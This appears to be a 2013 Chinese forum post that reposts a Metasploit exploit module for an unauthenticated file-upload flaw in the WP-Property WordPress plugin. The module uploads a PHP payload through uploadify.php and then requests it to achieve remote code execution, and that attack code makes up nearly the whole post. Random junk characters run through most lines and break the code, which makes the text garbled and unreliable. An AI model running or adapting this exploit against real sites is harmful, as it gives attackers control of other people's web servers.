WordPress WP-Property PHP 文件上传漏洞
' r: W: T, U* | Q( T1 h1 S
; h+ d( A1 Q8 F' {7 Z. u& @) E ## # This file is part of the Metasploit Framework and may be subject to
# w4 Z! D4 _. x/ |2 r, d* e3 c; T; u4 I& L6 P) \
# redistribution and commercial restrictions. Please see the Metasploit. m6 X% v7 O* ^5 F
0 ?5 a# \" c+ ]* j# R- T
# Framework web site for more information on licensing and terms of use.; T& r s8 @6 u8 I; F6 u
$ i. i# A6 ~2 c# http://metasploit.com/framework/ ##0 G# K R! L" a" L3 e, @8 n
. A" m+ f* ^3 W
8 @2 q6 M+ [7 ~2 S& U; ^% b) L0 Q: a, {) q2 d& d
% ?0 p; f+ |, c0 J/ U
( ]% i4 b! u6 K6 }8 L
require 'msf/core' }9 Y* P+ F9 T% E
require 'msf/core/exploit/php_exe'+ {8 o( i$ Q/ Y: J; Z# Z; Q
& B: e" Z5 u/ ~; O" bclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
% w: z$ S u/ J! `'Description' => %q{
0 f! o! E' o0 y- R" ^This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
+ \6 O" f0 |& W: u8 M[
; T4 @, N0 O, W) t5 L* ['Sammy FORGIT', # initial discovery
4 e x, L* H$ x' ?7 A'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& g* S- e8 @1 T p/ Y$ c, _) P],
; j1 l' G3 K" x& t'License' => MSF_LICENSE,6 a6 s. F s- ~" o
'References' =>& [; X% b3 R) o/ P% [! [! d
[" m' i; F( a( O4 C0 ~
[ 'OSVDB', '82656' ],
% m, N( ?. ]' c[ 'BID', '53787' ],2 I b9 H7 n, ^2 B4 g
[ 'EDB', '18987'],, Q! x. C( a, j% k* g$ ?
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
. I) B; N' \& {- a],
* C) M' i+ t9 @' y'Payload' =>- L5 |" j5 I' f( r
{! Z$ L! ?* n6 D; \" [9 N1 I
'BadChars' => "\x00",
! k/ L4 H% F* {: T7 Z, I},
+ R: [6 F( w( Q2 S) W: i8 S'Platform' => 'php',
' S2 [: ]- N3 c'Arch' => ARCH_PHP,
' v) O7 S7 r7 q5 F; B'Targets' =>) s( v5 g, P' F
[# K5 [, j7 \& m7 i, w+ C
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+ m- @/ l7 H m4 ]! z[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
/ P: p7 Y# I; u+ B],- D, ]& n" a+ }
'DefaultTarget' => 0,
7 \2 ^+ b5 n, y% K! H- N) m6 l+ d'DisclosureDate' => 'Mar 26 2012'))4 @. R( L5 B5 c* }
7 y6 A( o% Y# D9 e: _; tregister_options(. E$ |4 s7 c3 A0 [. A
[/ y4 r0 }: V7 l Y1 k& ?" v
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. U8 p) \6 E& W+ L0 t* J], self.class): C3 g# u P3 \% J, [
end
2 ?7 Q' Z& k S( L/ ~# x; U: X7 r0 d3 h4 d v7 F9 z: q
def check
4 p$ R$ ?- ]& k; V. ]- I9 nuri = target_uri.path
1 U% e9 M. B) k+ buri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',9 v3 f: j3 h2 R: K- b
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
& n$ S- o- Q$ G( N. H/ B})7 K+ B' F/ d$ {& Y, J K
& Q! m4 {: P* ~' l9 u& U
if not res or res.code != 200& J5 h( ?( n, l8 b( u- D
return Exploit::CheckCode::Unknown5 P, T/ w3 D/ y
end
9 I4 u9 Q; V" d" Y6 q7 P% R
5 F/ S7 Y( G- x4 Creturn Exploit::CheckCode::Appears
+ j: \4 f* {8 C% R* ]end# i# M1 F9 x, {% B
' C1 [4 s3 M1 W( I7 _, Z& Ddef exploit2 {! P! c+ {/ p( i! @; H
uri = target_uri.path
6 m9 ]% z7 A0 auri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
8 g9 ~9 M& R3 m% ]0 `- F3 y8 @% o1 X; w
data = Rex::MIME::Message.new' M7 o O6 h# {8 a
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
, j1 x9 s6 O( e5 q, p8 x( |3 G0 Adata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
2 t. c/ x$ l, S# W- ~1 R5 i6 o7 U$ Jpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')& D- w% O$ L% H, }5 |
, x; @, k3 t# {; Y9 h: P n' G6 T
print_status("#{peer} - Uploading payload #{@payload_name}")8 P/ f8 P9 c! M5 k. ^ o p
res = send_request_cgi({
8 I; V0 Q/ |+ I9 D0 y6 r2 e'method' => 'POST',
& p' W! P: {* x/ G$ S'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",, f! u; A/ _" i( m/ X. W. h
'ctype' => "multipart/form-data; boundary=#{data.bound}",; \6 l" ]: t+ I1 r6 C
'data' => post_data
. K) U. M5 _0 i' p! d' w})
2 A& W4 m3 b' }3 N* q& f/ Y5 ^- M$ n! b
if not res or res.code != 200 or res.body !~ /#{@payload_name}/2 `) z* u5 u2 x1 Q
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
- F8 \' L B Z9 L; S2 lend# Q' c8 P7 q8 T, W
8 N4 m- L# T- _& O. Mupload_uri = res.body
: M& H( L8 M% d6 m, M) |+ P8 J, k' B; s. X& J+ |' q- }+ d! w
print_status("#{peer} - Executing payload #{@payload_name}")( g' h4 p8 t/ r- U8 ]# O' E; ~
res = send_request_raw({# d, f/ E1 @2 r% ] C) w
'uri' => upload_uri,; v2 `/ A! N) ~6 _# s
'method' => 'GET'
8 W+ h/ D: U- @0 d' v}): {/ Y' \6 L& t) x) o; s5 m( z" V5 y
end
3 m* F+ z- m. R% F$ v' Kend
% ^/ l1 o. Q/ k# P2 E- D0 z
1 S0 `# D# x' Q. G. d1 i不要问我这写的是什么 怎么利用 我是说msf.
* P5 a- h/ B0 W6 d; P' ^/ u0 c. |4 P7 R- o4 [8 ~5 H7 @. W
|
发表于 2013-1-4 19:51:30
收藏
支持
反对